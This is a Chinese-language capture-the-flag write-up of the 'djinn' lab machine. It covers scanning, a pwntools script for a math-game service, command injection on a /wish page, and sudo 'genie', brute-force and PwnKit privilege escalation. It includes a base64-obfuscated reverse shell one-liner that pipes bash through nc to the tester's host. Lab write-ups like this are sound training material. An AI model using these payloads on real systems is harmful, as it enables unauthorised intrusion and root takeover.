【OSCP】djinn

admin 2024年9月23日13:14:24评论12 views字数 5558阅读18分31秒阅读模式
【OSCP】djinn

OSCP 靶场

【OSCP】djinn

靶场介绍

djinn

easy

ftp使用、端口敲打、python 脚本编写、命令执行漏洞、sudo—genie 提权、程序分析、pkexec提权

信息收集

主机发现

【OSCP】djinn

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.47
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 02:36 EST
Nmap scan report for 192.168.1.47
Host is up (0.00068s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| x20/ _ x20 | | | | '_ ` _ x20/ _ n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '-', 3)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| x20/ _ x20 | | | | '_ ` _ x20/ _ n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '+', 4)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.94%I=7%D=2/22%Time=65D6F989%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1BC,"x20x20____x20x20x20x20x20x20x20x20x20x20x20x20x2
SF:0x20x20x20x20x20x20x20x20x20x20x20_____x20_x20x20x20x20
SF:x20x20x20x20x20x20x20x20x20x20x20x20nx20/x20___|x20__
SF:x20_x20_x20__x20___x20x20x20___x20x20|_x20x20x20_(_)_x20
SF:__x20___x20x20x20___x20n|x20|x20x20_x20/x20_`x20|x20'_
SF:x20`x20_x20\x20/x20_x20\x20x20x20|x20|x20|x20|x20'_x
SF:20`x20_x20\x20/x20_x20\n|x20|_|x20|x20(_|x20|x20|
SF:x20|x20|x20|x20|x20x20__/x20x20x20|x20|x20|x20|x20
SF:|x20|x20|x20|x20|x20x20__/nx20\____|\__,_|_|x20|_|
SF:x20|_|\___|x20x20x20|_|x20|_|_|x20|_|x20|_|\___|n
SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x2
SF:0x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x
SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20
SF:nnLet'sx20seex20howx20goodx20youx20arex20withx20simplex20maths
SF:nAnswerx20myx20questionsx201000x20timesx20andx20I'llx20givex20
SF:youx20yourx20gift.n(4,x20'-',x203)n>x20")%r(RPCCheck,1BC,"x2
SF:0x20____x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x
SF:20x20x20x20x20x20x20x20x20_____x20_x20x20x20x20x20x20x2
SF:0x20x20x20x20x20x20x20x20x20nx20/x20___|x20__x20_x20_x
SF:20__x20___x20x20x20___x20x20|_x20x20x20_(_)_x20__x20___x
SF:20x20x20___x20n|x20|x20x20_x20/x20_`x20|x20'_x20`x20_x
SF:20\x20/x20_x20\x20x20x20|x20|x20|x20|x20'_x20`x20_x2
SF:0\x20/x20_x20\n|x20|_|x20|x20(_|x20|x20|x20|x20|
SF:x20|x20|x20x20__/x20x20x20|x20|x20|x20|x20|x20|x20
SF:|x20|x20|x20x20__/nx20\____|\__,_|_|x20|_|x20|_|\_
SF:__|x20x20x20|_|x20|_|_|x20|_|x20|_|\___|nx20x20x2
SF:0x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x
SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20
SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20nnLet'sx2
SF:0seex20howx20goodx20youx20arex20withx20simplex20mathsnAnswerx2
SF:0myx20questionsx201000x20timesx20andx20I'llx20givex20youx20your
SF:x20gift.n(7,x20'+',x204)n>x20");
MAC Address: 08:00:27:9F:39:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix

【OSCP】djinn

从ftp 匿名访问中获取提示,我们访问1337 端口会被一直重置

【OSCP】djinn

【OSCP】djinn

【OSCP】djinn

【OSCP】djinn

这里提示计算1000次才通关,我们使用python来写个脚本

【OSCP】djinn

import pwn
import time

c = pwn.remote('192.168.1.47', '1337')
c.recvuntil('gift.n')

count=0

while count < 1001:
count += 1
data = c.recvuntil(b")").decode()
c.recv()
print(data)
num1, num2, todo = int(data[1]), int(data[9]), data[5]

if todo == "+":
answer= num1 + num2
elif todo == '-':
answer= num1 - num2
elif todo == '*':
answer= num1 * num2
elif todo == '/':
answer= num1 / num2
c.send((str(answer) + "nr").encode())
print(answer, count)
time.sleep(0.5)

print(c.recv().decode())

【OSCP】djinn

重新扫描端口,可以发现22端口开放了。

【OSCP】djinn

目录扫描

通过目录扫描到wish 目录

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.47:7331 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.47:7331
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.47:7331/wish (Status: 200) [Size: 385]

【OSCP】djinn

可以看到直接就是一个命令执行

【OSCP】djinn

权限获取

使用https://www.revshells.com/ 生成反弹shell,这里正常代理反弹不了,需要base64 获取其他编码【OSCP】djinn

echo ` echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjEyOSA4OTg5ID4vdG1wL2Y=" | base64 -d ` | sh -

【OSCP】djinn

权限提升

在nitish 用户的隐藏目录下找到ssh 登录密码

【OSCP】djinn

【OSCP】djinn

https://gtfobins.github.io/gtfobins/genie/

【OSCP】djinn

sudo -u sam /usr/bin/genie b -cmd

【OSCP】djinn

lago程序运行后选择第2个选项猜数字游戏,它会让你从1-100选一个数,当你猜中了就会返回shell

【OSCP】djinn

执行如下命令,然后我们一直输入2,直到进行shell,提权到root

while true;do sudo /root/lago; done

【OSCP】djinn

补充

也可以使用pkexec 直接提权到root 权限

find / -perm -u=s -type f 2>/dev/null

【OSCP】djinn

使用如下exp 直接提权到root 权限

https://github.com/luijait/PwnKit-Exploit

【OSCP】djinn

End

“点赞、在看与分享都是莫大的支持”

【OSCP】djinn

【OSCP】djinn

原文始发于微信公众号(贝雷帽SEC):【OSCP】djinn

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月23日13:14:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】djinnhttp://cn-sec.com/archives/3196633.html

发表评论

匿名网友 填写信息